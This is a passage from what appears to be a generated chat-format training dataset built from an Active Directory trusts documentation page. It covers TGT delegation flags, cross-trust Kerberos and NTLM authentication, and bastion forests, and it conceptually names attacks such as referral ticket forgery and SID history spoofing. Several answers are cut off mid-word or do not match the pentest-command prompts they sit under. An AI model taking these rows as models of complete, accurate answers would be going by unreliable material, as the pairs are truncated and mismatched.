(0x00000008) flag is set), then Forest-Wide ", "metadata": {"corpus_index": 1126, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Trusts - TGT delegation"}, {"role": "assistant", "content": "Kerberos unconstrained delegation (KUD) allows a service configured for it to impersonate (almost) any user on any other service. This is a dangerous feature to configure, that won't be explained into many details here as the Kerberos, Kerberos delegations and Kerberos unconstrained delegations pages already cover it.\n\nKerberos unconstrained delegations could be abused across trusts to take control over any resource of the trusting domain, including the domain controller, as long as the trusted domain is compromised. This relies on the delegation of TGT across trusts, which can be disabled.\n\nIf TGT delegation is disabled in a trust, attackers won't be able to escalate from one domain to another by abusing unconstrained delegation. On a side note, the other types of delegations are not affected by this as they don't rely on the delegation of tickets, but on S4U extensions instead.\n\n> [!TIP]\n> The TGT delegation status of a trust depends on the trustAttributes flags of a TDO.\n>\n> >* If the TRUST_ATTRIBUTE_CROSS_ORGANIZATION_NO_TGT_DELEGATION (0x00000200) flag is set, then TGT Delegation is disabled.\n> >* If the TRUST_ATTRIBUTE_QUARANTINED_DOMAIN (0x00000004) flag is set, then TGT Delegation is disabled.\n> >* If the TRUST_ATTRIBUTE_CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION (0x00000800)flag is set, then TGT Delegation is enabled.\n> >* If the TRUST_ATTRIBUTE_WITHIN_FOREST (0x00000020) flag is set, then TGT Delegation is enabled.\n> >\n> >_(by_ _Carsten Sandker_ _on_ _www.securesystems.de__)_"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Trusts - TGT delegation", "response": "Kerberos unconstrained delegation (KUD) allows a service configured for it to impersonate (almost) any user on any other service. This is a dangerous feature to configure, that won't be explained into many details here as the Kerberos, Kerberos delegations and Kerberos unconstrained delegations pages already cover it.\n\nKerberos unconstrained delegations could be abused across trusts to take control over any resource of the trusting domain, including the domain controller, as long as the trusted domain is compromised. This relies on the delegation of TGT across trusts, which can be disabled.\n\nIf TGT delegation is disabled in a trust, attackers won't be able to escalate from one domain to another by abusing unconstrained delegation. On a side note, the other types of delegations are not affected by this as they don't rely on the delegation of tickets, but on S4U extensions instead.\n\n> [!TIP]\n> The TGT delegation status of a trust depends on the trustAttributes flags of a TDO.\n>\n> >* If the TRUST_ATTRIBUTE_CROSS_ORGANIZATION_NO_TGT_DELEGATION (0x00000200) flag is set, then TGT Delegation is disabled.\n> >* If the TRUST_ATTRIBUTE_QUARANTINED_DOMAIN (0x00000004) flag is set, then TGT Delegation is disabled.\n> >* If the TRUST_ATTRIBUTE_CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION (0x00000800)flag is set, then TGT Delegation is enabled.\n> >* If the TRUST_ATTRIBUTE_WITHIN_FOREST (0x00000020) flag is set, then TGT Delegation is enabled.\n> >\n> >_(by_ _Carsten Sandker_ _on_ _www.securesystems.de__)_", "metadata": {"corpus_index": 1127, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Trusts - TGT delegation during a pentest?"}, {"role": "assistant", "content": "Kerberos unconstrained delegation (KUD) allows a service configured for it to impersonate (almost) any user on any other service. This is a dangerous feature to configure, that won't be explained into many details here as the Kerberos, Kerberos delegations and Kerberos unconstrained delegations pages already cover it.\n\nKerberos unconstrained delegations could be abused across trusts to take control over any resource of the trusting domain, including the domain controller, as long as the trusted domain is compromised. This relies on the delegation of TGT across trusts, which can be disabled.\n\nIf TGT delegation is disabled in a trust, attackers won't be able to escalate from one domain to another by abusing unconstrained delegation. On a side note, the other types of delegations are not affected by this as they don't rely on the delegation of tickets, but on S4U extensions instead.\n\n> [!TIP]\n> The TGT delegation status of a trust depends on the trustAttributes flags of a TDO.\n>\n> >* If the TRUST_ATTRIBUTE_CROSS_ORGANIZATION_NO_TGT_DELEGATION (0x00000200) flag is set, then TGT Delegation is disabled.\n> >* If the TRUST_ATTRIBUTE_QUARANTINED_DOMAIN (0x00000004) flag is set, then TGT Delegation is disabled.\n> >* If the TRUST_ATTRIBUTE_CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION (0x00000800)flag is set, then TGT Delegation is enabled.\n> >* If the TRUST_ATTRIBUTE_WITHIN_FOREST (0x00000020) flag is set, then TGT Delegation is enabled.\n> >\n> >_(by_ _Carsten Sandker_ _on_ _www.securesystems.de__)_"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Trusts - TGT delegation during a pentest?", "response": "Kerberos unconstrained delegation (KUD) allows a service configured for it to impersonate (almost) any user on any other service. This is a dangerous feature to configure, that won't be explained into many details here as the Kerberos, Kerberos delegations and Kerberos unconstrained delegations pages already cover it.\n\nKerberos unconstrained delegations could be abused across trusts to take control over any resource of the trusting domain, including the domain controller, as long as the trusted domain is compromised. This relies on the delegation of TGT across trusts, which can be disabled.\n\nIf TGT delegation is disabled in a trust, attackers won't be able to escalate from one domain to another by abusing unconstrained delegation. On a side note, the other types of delegations are not affected by this as they don't rely on the delegation of tickets, but on S4U extensions instead.\n\n> [!TIP]\n> The TGT delegation status of a trust depends on the trustAttributes flags of a TDO.\n>\n> >* If the TRUST_ATTRIBUTE_CROSS_ORGANIZATION_NO_TGT_DELEGATION (0x00000200) flag is set, then TGT Delegation is disabled.\n> >* If the TRUST_ATTRIBUTE_QUARANTINED_DOMAIN (0x00000004) flag is set, then TGT Delegation is disabled.\n> >* If the TRUST_ATTRIBUTE_CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION (0x00000800)flag is set, then TGT Delegation is enabled.\n> >* If the TRUST_ATTRIBUTE_WITHIN_FOREST (0x00000020) flag is set, then TGT Delegation is enabled.\n> >\n> >_(by_ _Carsten Sandker_ _on_ _www.securesystems.de__)_", "metadata": {"corpus_index": 1127, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Trusts - Kerberos authentication"}, {"role": "assistant", "content": "Understanding how Kerberos works is required here: the Kerberos protocol.\n\n> For a Kerberos authentication to occur across a domain trust, the Kerberos key distribution centers (KDCs) in two domains must have a shared secret, called an inter-realm key. This key is derived from a shared password.aspx), and rotates approximately every 30 days. Parent-child domains share an inter-realm key implicitly.\n>\n> When a user in domain A tries to authenticate or access a resource in domain B that he has established access to, he presents his ticket-granting-ticket (TGT) and request for a service ticket to the KDC for domain A. The KDC for A determines that the resource is not in its realm, and issues the user a referral ticket.\n>\n> This referral ticket is a ticket-granting-ticket (TGT) encrypted with the inter-realm key shared by domain A and B. The user presents this referral ticket to the KDC for domain B, which decrypts it with the inter-realm key, checks if the user in the ticket has access to the requested resource, and issues a service ticket. This process is described in detail in Microsoft's documentation.aspx#w2k3tr_kerb_how_pzvx) in the Simple Cross-Realm Authentication and Examples section.\n>\n> _(by_ _Will Schroeder_ _on_ _blog.harmj0y.net__)_\n\nFrom an offensive point of view, just like a golden ticket, a referral ticket could be forged. Forging a referral ticket using the inter-realm key, instead of relying on the krbtgt keys for a golden ticket, is a nice alternative for organizations that choose to roll their krbtgt keys, as they should. This technique is a little bit trickier though, as it requires to use the correct key.\n\nDepending on the trust characteristics, ticket forgery can also be combined with SID history spoofing for a direct privilege escalation from a child to a parent domain.\n\nWhen doing Kerberos authentications across trusts, the trusting domain's domain controller checks a few things before handing out service tickets to trusted users: SID filterin"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Trusts - Kerberos authentication", "response": "Understanding how Kerberos works is required here: the Kerberos protocol.\n\n> For a Kerberos authentication to occur across a domain trust, the Kerberos key distribution centers (KDCs) in two domains must have a shared secret, called an inter-realm key. This key is derived from a shared password.aspx), and rotates approximately every 30 days. Parent-child domains share an inter-realm key implicitly.\n>\n> When a user in domain A tries to authenticate or access a resource in domain B that he has established access to, he presents his ticket-granting-ticket (TGT) and request for a service ticket to the KDC for domain A. The KDC for A determines that the resource is not in its realm, and issues the user a referral ticket.\n>\n> This referral ticket is a ticket-granting-ticket (TGT) encrypted with the inter-realm key shared by domain A and B. The user presents this referral ticket to the KDC for domain B, which decrypts it with the inter-realm key, checks if the user in the ticket has access to the requested resource, and issues a service ticket. This process is described in detail in Microsoft's documentation.aspx#w2k3tr_kerb_how_pzvx) in the Simple Cross-Realm Authentication and Examples section.\n>\n> _(by_ _Will Schroeder_ _on_ _blog.harmj0y.net__)_\n\nFrom an offensive point of view, just like a golden ticket, a referral ticket could be forged. Forging a referral ticket using the inter-realm key, instead of relying on the krbtgt keys for a golden ticket, is a nice alternative for organizations that choose to roll their krbtgt keys, as they should. This technique is a little bit trickier though, as it requires to use the correct key.\n\nDepending on the trust characteristics, ticket forgery can also be combined with SID history spoofing for a direct privilege escalation from a child to a parent domain.\n\nWhen doing Kerberos authentications across trusts, the trusting domain's domain controller checks a few things before handing out service tickets to trusted users: SID filterin", "metadata": {"corpus_index": 1128, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Trusts - Kerberos authentication?"}, {"role": "assistant", "content": "Understanding how Kerberos works is required here: the Kerberos protocol.\n\n> For a Kerberos authentication to occur across a domain trust, the Kerberos key distribution centers (KDCs) in two domains must have a shared secret, called an inter-realm key. This key is derived from a shared password.aspx), and rotates approximately every 30 days. Parent-child domains share an inter-realm key implicitly.\n>\n> When a user in domain A tries to authenticate or access a resource in domain B that he has established access to, he presents his ticket-granting-ticket (TGT) and request for a service ticket to the KDC for domain A. The KDC for A determines that the resource is not in its realm, and issues the user a referral ticket.\n>\n> This referral ticket is a ticket-granting-ticket (TGT) encrypted with the inter-realm key shared by domain A and B. The user presents this referral ticket to the KDC for domain B, which decrypts it with the inter-realm key, checks if the user in the ticket has access to the requested resource, and issues a service ticket. This process is described in detail in Microsoft's documentation.aspx#w2k3tr_kerb_how_pzvx) in the Simple Cross-Realm Authentication and Examples section.\n>\n> _(by_ _Will Schroeder_ _on_ _blog.harmj0y.net__)_\n\nFrom an offensive point of view, just like a golden ticket, a referral ticket could be forged. Forging a referral ticket using the inter-realm key, instead of relying on the krbtgt keys for a golden ticket, is a nice alternative for organizations that choose to roll their krbtgt keys, as they should. This technique is a little bit trickier though, as it requires to use the correct key.\n\nDepending on the trust characteristics, ticket forgery can also be combined with SID history spoofing for a direct privilege escalation from a child to a parent domain.\n\nWhen doing Kerberos authentications across trusts, the trusting domain's domain controller checks a few things before handing out service tickets to trusted users: SID filterin"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Trusts - Kerberos authentication?", "response": "Understanding how Kerberos works is required here: the Kerberos protocol.\n\n> For a Kerberos authentication to occur across a domain trust, the Kerberos key distribution centers (KDCs) in two domains must have a shared secret, called an inter-realm key. This key is derived from a shared password.aspx), and rotates approximately every 30 days. Parent-child domains share an inter-realm key implicitly.\n>\n> When a user in domain A tries to authenticate or access a resource in domain B that he has established access to, he presents his ticket-granting-ticket (TGT) and request for a service ticket to the KDC for domain A. The KDC for A determines that the resource is not in its realm, and issues the user a referral ticket.\n>\n> This referral ticket is a ticket-granting-ticket (TGT) encrypted with the inter-realm key shared by domain A and B. The user presents this referral ticket to the KDC for domain B, which decrypts it with the inter-realm key, checks if the user in the ticket has access to the requested resource, and issues a service ticket. This process is described in detail in Microsoft's documentation.aspx#w2k3tr_kerb_how_pzvx) in the Simple Cross-Realm Authentication and Examples section.\n>\n> _(by_ _Will Schroeder_ _on_ _blog.harmj0y.net__)_\n\nFrom an offensive point of view, just like a golden ticket, a referral ticket could be forged. Forging a referral ticket using the inter-realm key, instead of relying on the krbtgt keys for a golden ticket, is a nice alternative for organizations that choose to roll their krbtgt keys, as they should. This technique is a little bit trickier though, as it requires to use the correct key.\n\nDepending on the trust characteristics, ticket forgery can also be combined with SID history spoofing for a direct privilege escalation from a child to a parent domain.\n\nWhen doing Kerberos authentications across trusts, the trusting domain's domain controller checks a few things before handing out service tickets to trusted users: SID filterin", "metadata": {"corpus_index": 1128, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Trusts - NTLM authentication"}, {"role": "assistant", "content": "In an NTLM authentication sequence, a user authenticates to a resource by sending an NTLM Negotiate message, receiving an NTLM Challenge, and then sending back an NTLM Authenticate. The server then passes the logon request through to the Domain Controller, using the Netlogon Remote Protocol.\n\n> This mechanism of delegating the authentication request to a DC is called pass-through authentication.\n>\n> Upon successful validation of the user credentials on the DC, the Netlogon Remote Protocol delivers the user authorization attributes (referred to as user validation information) back to the server over the secure channel.\n>\n> _(__Microsoft.com__)_\n\nWhen using NTLM across trust relationships, the process is very similar.\n\nWhen a trusted domain's user wants to access a resource from a trusting domain, the user and the resource engage in the standard 3-way NTLM handshake. Upon receiving the NTLM Authenticate message, the resource forwards it to its own domain controller through a Netlogon \"workstation secure channel\". The trusting DC forwards it as well to the trusted domain's DC through a Netlogon \"trusted domain secure channel\".\n\nThe trusted domain's DC does the usual checks and passes the result to the trusting DC, which in turn passes it to the resource. The resource then accepts or rejects the authentication based on the decision passed through the DCs.\n\nWhen doing NTLM authentications across trusts, the trusting domain's domain controller checks a few things from the user info structure supplied by the trusted domain controller: SID filtering (looking in the ExtraSids attribute from the NETLOGON_VALIDATION_SAM_INFO2 structure), and Selective Authentication limitation during the DC's validation of the user credentials. TGT delegation verification doesn't occur here, since it's a Kerberos mechanism.\n\n_Nota bene, wether it's Kerberos or NTLM, the ExtraSids are in the same data structure, it's just named differently for each protocol. And, the SID filtering function call"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Trusts - NTLM authentication", "response": "In an NTLM authentication sequence, a user authenticates to a resource by sending an NTLM Negotiate message, receiving an NTLM Challenge, and then sending back an NTLM Authenticate. The server then passes the logon request through to the Domain Controller, using the Netlogon Remote Protocol.\n\n> This mechanism of delegating the authentication request to a DC is called pass-through authentication.\n>\n> Upon successful validation of the user credentials on the DC, the Netlogon Remote Protocol delivers the user authorization attributes (referred to as user validation information) back to the server over the secure channel.\n>\n> _(__Microsoft.com__)_\n\nWhen using NTLM across trust relationships, the process is very similar.\n\nWhen a trusted domain's user wants to access a resource from a trusting domain, the user and the resource engage in the standard 3-way NTLM handshake. Upon receiving the NTLM Authenticate message, the resource forwards it to its own domain controller through a Netlogon \"workstation secure channel\". The trusting DC forwards it as well to the trusted domain's DC through a Netlogon \"trusted domain secure channel\".\n\nThe trusted domain's DC does the usual checks and passes the result to the trusting DC, which in turn passes it to the resource. The resource then accepts or rejects the authentication based on the decision passed through the DCs.\n\nWhen doing NTLM authentications across trusts, the trusting domain's domain controller checks a few things from the user info structure supplied by the trusted domain controller: SID filtering (looking in the ExtraSids attribute from the NETLOGON_VALIDATION_SAM_INFO2 structure), and Selective Authentication limitation during the DC's validation of the user credentials. TGT delegation verification doesn't occur here, since it's a Kerberos mechanism.\n\n_Nota bene, wether it's Kerberos or NTLM, the ExtraSids are in the same data structure, it's just named differently for each protocol. And, the SID filtering function call", "metadata": {"corpus_index": 1129, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Trusts - NTLM authentication"}, {"role": "assistant", "content": "In an NTLM authentication sequence, a user authenticates to a resource by sending an NTLM Negotiate message, receiving an NTLM Challenge, and then sending back an NTLM Authenticate. The server then passes the logon request through to the Domain Controller, using the Netlogon Remote Protocol.\n\n> This mechanism of delegating the authentication request to a DC is called pass-through authentication.\n>\n> Upon successful validation of the user credentials on the DC, the Netlogon Remote Protocol delivers the user authorization attributes (referred to as user validation information) back to the server over the secure channel.\n>\n> _(__Microsoft.com__)_\n\nWhen using NTLM across trust relationships, the process is very similar.\n\nWhen a trusted domain's user wants to access a resource from a trusting domain, the user and the resource engage in the standard 3-way NTLM handshake. Upon receiving the NTLM Authenticate message, the resource forwards it to its own domain controller through a Netlogon \"workstation secure channel\". The trusting DC forwards it as well to the trusted domain's DC through a Netlogon \"trusted domain secure channel\".\n\nThe trusted domain's DC does the usual checks and passes the result to the trusting DC, which in turn passes it to the resource. The resource then accepts or rejects the authentication based on the decision passed through the DCs.\n\nWhen doing NTLM authentications across trusts, the trusting domain's domain controller checks a few things from the user info structure supplied by the trusted domain controller: SID filtering (looking in the ExtraSids attribute from the NETLOGON_VALIDATION_SAM_INFO2 structure), and Selective Authentication limitation during the DC's validation of the user credentials. TGT delegation verification doesn't occur here, since it's a Kerberos mechanism.\n\n_Nota bene, wether it's Kerberos or NTLM, the ExtraSids are in the same data structure, it's just named differently for each protocol. And, the SID filtering function call"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Trusts - NTLM authentication", "response": "In an NTLM authentication sequence, a user authenticates to a resource by sending an NTLM Negotiate message, receiving an NTLM Challenge, and then sending back an NTLM Authenticate. The server then passes the logon request through to the Domain Controller, using the Netlogon Remote Protocol.\n\n> This mechanism of delegating the authentication request to a DC is called pass-through authentication.\n>\n> Upon successful validation of the user credentials on the DC, the Netlogon Remote Protocol delivers the user authorization attributes (referred to as user validation information) back to the server over the secure channel.\n>\n> _(__Microsoft.com__)_\n\nWhen using NTLM across trust relationships, the process is very similar.\n\nWhen a trusted domain's user wants to access a resource from a trusting domain, the user and the resource engage in the standard 3-way NTLM handshake. Upon receiving the NTLM Authenticate message, the resource forwards it to its own domain controller through a Netlogon \"workstation secure channel\". The trusting DC forwards it as well to the trusted domain's DC through a Netlogon \"trusted domain secure channel\".\n\nThe trusted domain's DC does the usual checks and passes the result to the trusting DC, which in turn passes it to the resource. The resource then accepts or rejects the authentication based on the decision passed through the DCs.\n\nWhen doing NTLM authentications across trusts, the trusting domain's domain controller checks a few things from the user info structure supplied by the trusted domain controller: SID filtering (looking in the ExtraSids attribute from the NETLOGON_VALIDATION_SAM_INFO2 structure), and Selective Authentication limitation during the DC's validation of the user credentials. TGT delegation verification doesn't occur here, since it's a Kerberos mechanism.\n\n_Nota bene, wether it's Kerberos or NTLM, the ExtraSids are in the same data structure, it's just named differently for each protocol. And, the SID filtering function call", "metadata": {"corpus_index": 1129, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Trusts - MIM PAM & Bastion (Red Forests) work?"}, {"role": "assistant", "content": "> [!TIP]\n> The following section is a light adaptation of Nikhil Mittal's and Daniel Ulrichs's work.\n\nMicrosoft introduced MIM (Microsoft Identity Manager) Privileged Access Management (PAM) with Server 2016, including the following features. (Sometimes PAM is also referred to as PIM in some docs/links).\n\n* A Bastion forest (i.e. forest in ESAE (Enhanced Security Admin Environment), a.k.a. Red Forest)\n* Shadow Security Principals (i.e. admins in Bastion Forest can be mapped as Domain Admins or a \"User Forest\")\n* Temporary group membership (i.e. add a user to a group with a time-to-live (TTL))\n\nPAM enables the management of an existing \"Production Forest\" (one can think of that as a User Forest as well) using a \"Bastion Forest\" which has a one-way PAM trust with the existing forest. The users in the Bastion Forest can be 'mapped' to privileged groups like \"Domain Admins\" and \"Enterprise Admins\" in the Production Forest without modifying any group memberships or ACLs. This takes away the administrative overhead and reduces the chances of lateral movement techniques.\n\nThis is done by creating \"Shadow Security Principals\" in the Bastion Forest, which are mapped to SIDs for high-privileged groups in the User Forest, and then adding users from the Bastion Forest as members of the Shadow Security Principals.\n\n::: details More technical notes\n\nThe main Active Directory Objects and Attributes related to the Bastion Forest are the following:\n\n1. msDS-ShadowPrincipalContainer: dedicated container class for msDS-ShadowPrincipal objects. One default container (CN=Shadow Principal Configuration) is created in the Services container in the Configuration NC on the Bastion Forest). NB: Privileged Containers can be created in other locations as well, however, Kerberos will NOT work there.\n2. msDS-ShadowPrincipal: principal from an external forest (Bastion Forest). Has the msDS-ShadowPrincipalSid attribute and can only be in a Shadow Principal container. Any principal may be represent"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Trusts - MIM PAM & Bastion (Red Forests) work?", "response": "> [!TIP]\n> The following section is a light adaptation of Nikhil Mittal's and Daniel Ulrichs's work.\n\nMicrosoft introduced MIM (Microsoft Identity Manager) Privileged Access Management (PAM) with Server 2016, including the following features. (Sometimes PAM is also referred to as PIM in some docs/links).\n\n* A Bastion forest (i.e. forest in ESAE (Enhanced Security Admin Environment), a.k.a. Red Forest)\n* Shadow Security Principals (i.e. admins in Bastion Forest can be mapped as Domain Admins or a \"User Forest\")\n* Temporary group membership (i.e. add a user to a group with a time-to-live (TTL))\n\nPAM enables the management of an existing \"Production Forest\" (one can think of that as a User Forest as well) using a \"Bastion Forest\" which has a one-way PAM trust with the existing forest. The users in the Bastion Forest can be 'mapped' to privileged groups like \"Domain Admins\" and \"Enterprise Admins\" in the Production Forest without modifying any group memberships or ACLs. This takes away the administrative overhead and reduces the chances of lateral movement techniques.\n\nThis is done by creating \"Shadow Security Principals\" in the Bastion Forest, which are mapped to SIDs for high-privileged groups in the User Forest, and then adding users from the Bastion Forest as members of the Shadow Security Principals.\n\n::: details More technical notes\n\nThe main Active Directory Objects and Attributes related to the Bastion Forest are the following:\n\n1. msDS-ShadowPrincipalContainer: dedicated container class for msDS-ShadowPrincipal objects. One default container (CN=Shadow Principal Configuration) is created in the Services container in the Configuration NC on the Bastion Forest). NB: Privileged Containers can be created in other locations as well, however, Kerberos will NOT work there.\n2. msDS-ShadowPrincipal: principal from an external forest (Bastion Forest). Has the msDS-ShadowPrincipalSid attribute and can only be in a Shadow Principal container. Any principal may be represent", "metadata": {"corpus_index": 1130, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Trusts - MIM PAM & Bastion (Red Forests)"}, {"role": "assistant", "content": "> [!TIP]\n> The following section is a light adaptation of Nikhil Mittal's and Daniel Ulrichs's work.\n\nMicrosoft introduced MIM (Microsoft Identity Manager) Privileged Access Management (PAM) with Server 2016, including the following features. (Sometimes PAM is also referred to as PIM in some docs/links).\n\n* A Bastion forest (i.e. forest in ESAE (Enhanced Security Admin Environment), a.k.a. Red Forest)\n* Shadow Security Principals (i.e. admins in Bastion Forest can be mapped as Domain Admins or a \"User Forest\")\n* Temporary group membership (i.e. add a user to a group with a time-to-live (TTL))\n\nPAM enables the management of an existing \"Production Forest\" (one can think of that as a User Forest as well) using a \"Bastion Forest\" which has a one-way PAM trust with the existing forest. The users in the Bastion Forest can be 'mapped' to privileged groups like \"Domain Admins\" and \"Enterprise Admins\" in the Production Forest without modifying any group memberships or ACLs. This takes away the administrative overhead and reduces the chances of lateral movement techniques.\n\nThis is done by creating \"Shadow Security Principals\" in the Bastion Forest, which are mapped to SIDs for high-privileged groups in the User Forest, and then adding users from the Bastion Forest as members of the Shadow Security Principals.\n\n::: details More technical notes\n\nThe main Active Directory Objects and Attributes related to the Bastion Forest are the following:\n\n1. msDS-ShadowPrincipalContainer: dedicated container class for msDS-ShadowPrincipal objects. One default container (CN=Shadow Principal Configuration) is created in the Services container in the Configuration NC on the Bastion Forest). NB: Privileged Containers can be created in other locations as well, however, Kerberos will NOT work there.\n2. msDS-ShadowPrincipal: principal from an external forest (Bastion Forest). Has the msDS-ShadowPrincipalSid attribute and can only be in a Shadow Principal container. Any principal may be represent"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Trusts - MIM PAM & Bastion (Red Forests)", "response": "> [!TIP]\n> The following section is a light adaptation of Nikhil Mittal's and Daniel Ulrichs's work.\n\nMicrosoft introduced MIM (Microsoft Identity Manager) Privileged Access Management (PAM) with Server 2016, including the following features. (Sometimes PAM is also referred to as PIM in some docs/links).\n\n* A Bastion forest (i.e. forest in ESAE (Enhanced Security Admin Environment), a.k.a. Red Forest)\n* Shadow Security Principals (i.e. admins in Bastion Forest can be mapped as Domain Admins or a \"User Forest\")\n* Temporary group membership (i.e. add a user to a group with a time-to-live (TTL))\n\nPAM enables the management of an existing \"Production Forest\" (one can think of that as a User Forest as well) using a \"Bastion Forest\" which has a one-way PAM trust with the existing forest. The users in the Bastion Forest can be 'mapped' to privileged groups like \"Domain Admins\" and \"Enterprise Admins\" in the Production Forest without modifying any group memberships or ACLs. This takes away the administrative overhead and reduces the chances of lateral movement techniques.\n\nThis is done by creating \"Shadow Security Principals\" in the Bastion Forest, which are mapped to SIDs for high-privileged groups in the User Forest, and then adding users from the Bastion Forest as members of the Shadow Security Principals.\n\n::: details More technical notes\n\nThe main Active Directory Objects and Attributes related to the Bastion Forest are the following:\n\n1. msDS-ShadowPrincipalContainer: dedicated container class for msDS-ShadowPrincipal objects. One default container (CN=Shadow Principal Configuration) is created in the Services container in the Configuration NC on the Bastion Forest). NB: Privileged Containers can be created in other locations as well, however, Kerberos will NOT work there.\n2. msDS-ShadowPrincipal: principal from an external forest (Bastion Forest). Has the msDS-ShadowPrincipalSid attribute and can only be in a Shadow Principal container. Any principal may be represent", "metadata": {"corpus_index": 1130, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use Bastion for trusts - mim pam & bastion (red forests)?"}, {"role": "assistant", "content": "Bastion ROOT (DC=BASTION,DC=LOCAL)\n├── Configuration Naming Context (CN=Configuration)\n│ ├── Services (CN=Services)\n│ │ ├── Default Shadow Principal Container (CN=Shadow Principal Configuration)\n│ │ │ ├── Shadow Principal object\n│ │ │ │ ├── name: prodForest-ShadowEntrepriseAdmin\n│ │ │ │ ├── member: { BASTION/bobby, BASTION/jason } (Users in Bastion Forest)\n│ │ │ │ ├── msDS-ShadowPrincipalSid: S-1-5-21-[...]-519 (Entreprise Admins @ PRODUCTION.LOCAL)\n│ │ │ │ ├── ...\n│ │ │ ├── Shadow Principal object\n│ │ │ │ ├── name: prodForest-ShadowDomainAdmin\n│ │ │ │ ├── member: { BASTION/max, BASTION/jason } (Users in Bastion Forest)\n│ │ │ │ ├── msDS-ShadowPrincipalSid: S-1-5-21-[...]-512 (Domain Admins @ PRODUCTION.LOCAL)\n│ │ │ │ ├── ...\n│ │ ├── [...]"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use Bastion for trusts - mim pam & bastion (red forests)?", "response": "Bastion ROOT (DC=BASTION,DC=LOCAL)\n├── Configuration Naming Context (CN=Configuration)\n│ ├── Services (CN=Services)\n│ │ ├── Default Shadow Principal Container (CN=Shadow Principal Configuration)\n│ │ │ ├── Shadow Principal object\n│ │ │ │ ├── name: prodForest-ShadowEntrepriseAdmin\n│ │ │ │ ├── member: { BASTION/bobby, BASTION/jason } (Users in Bastion Forest)\n│ │ │ │ ├── msDS-ShadowPrincipalSid: S-1-5-21-[...]-519 (Entreprise Admins @ PRODUCTION.LOCAL)\n│ │ │ │ ├── ...\n│ │ │ ├── 